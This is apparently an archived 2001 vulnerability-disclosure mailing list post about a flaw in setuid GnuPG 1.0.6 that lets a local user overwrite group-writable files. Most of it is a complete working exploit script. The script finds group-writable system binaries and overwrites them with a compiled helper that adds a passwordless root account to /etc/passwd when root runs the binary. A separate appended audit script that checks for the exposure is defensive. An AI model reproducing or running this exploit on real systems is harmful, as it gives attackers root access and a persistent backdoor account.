Vulnerability Development mailing list archives
Possible problem with GnuPG 1.0.6
From: Przemyslaw Frasunek <venglin () freebsd lublin pl>
Date: Sat, 29 Dec 2001 09:59:06 +0100
Hello,

I've just found strange behaviour with GnuPG 1.0.6 installed setuid (default on Mandrake, probably others?). When decrypting a file, it allows overwriting any group-writeable file in the system. It works for me on Mandrake 8.1, because a few system binaries are installed group-writeable (especially smbmount and smbumount).

Exploit attached.

#!/bin/sh
# babcia padlina 2001
# especially for pcoa :)
#
# GnuPG when installed setuid allows overwriting any group-writable
# files.
#
# Tested on generic Mandrake 8.1

if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then
	echo "GnuPG not installed or not setuid."
	exit 1
fi

if [ ! -x /usr/bin/gcc ]; then
	echo "gcc not installed."
	exit 1
fi

echo "Looking for group-writeable binaries..."
echo

BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 2>/dev/null`

if [ "X$BINS" != "X" ]; then
	echo "$BINS"
else
	echo "Sorry, this system is not exploitable."
	exit 1
fi

echo
echo "Compiling helper binary..."
echo

cat > own.c << __EOF__
main() {
	if (!getuid()) {
		system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd");
	}
}
__EOF__

/usr/bin/gcc -o own own.c > /dev/null 2>&1

if [ ! -x own ]; then
	echo "Compilation failed."
	exit 1
fi

rm -f own.c

echo "Overwriting binaries... Please confirm each one."
echo

for i in $BINS; do
	rm -f own.gpg
	echo owned | gpg --passphrase-fd 0 -c own
	echo owned | gpg --passphrase-fd 0 -o $i own.gpg
done

rm -f own own.gpg

echo
echo "Looks like everything is done. When root will run any of above"
echo "binaries, user babunia will be added with root privs."

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
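An administrator's check for the two preconditions the message names (a setuid /usr/bin/gpg and group-writable binaries in the system directories), as an added example that is not part of the original post. The function names and the RUN_AUDIT switch are hypothetical; the gpg path and the directory list are the ones from the message.

```shell
#!/bin/sh
# Added audit example, not code from the original message.
# Function names and RUN_AUDIT are hypothetical; paths come from the post.

AUDIT_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin"

# Succeeds only if the path is a regular file with the setuid bit set.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Print every regular file under the given directories that has the
# group-write bit set. Missing directories are skipped silently.
group_writable_files() {
    for dir in "$@"; do
        [ -d "$dir" ] && find "$dir" -type f -perm -0020 2>/dev/null
    done
    return 0
}

# Usage: audit_gpg_overwrite GPG_PATH DIR...
# Returns 1 (and lists owner, group and mode of each file) when both
# preconditions hold; returns 0 when at least one is absent.
audit_gpg_overwrite() {
    gpg_path=$1
    shift
    found=$(group_writable_files "$@")
    if is_setuid "$gpg_path" && [ -n "$found" ]; then
        echo "EXPOSED: $gpg_path is setuid and these files are group-writable:"
        echo "$found" | while IFS= read -r f; do
            ls -ld "$f"
        done
        echo "Fix: chmod g-w on the files above, or chmod u-s $gpg_path"
        return 1
    fi
    echo "OK: the two preconditions are not both present"
    return 0
}

# Scan the live system only when asked: RUN_AUDIT=1 sh audit.sh
if [ "${RUN_AUDIT:-0}" = 1 ]; then
    audit_gpg_overwrite /usr/bin/gpg $AUDIT_DIRS
fi
```

Removing either condition (the group-write bit on the listed files or the setuid bit on gpg) makes the audit return 0.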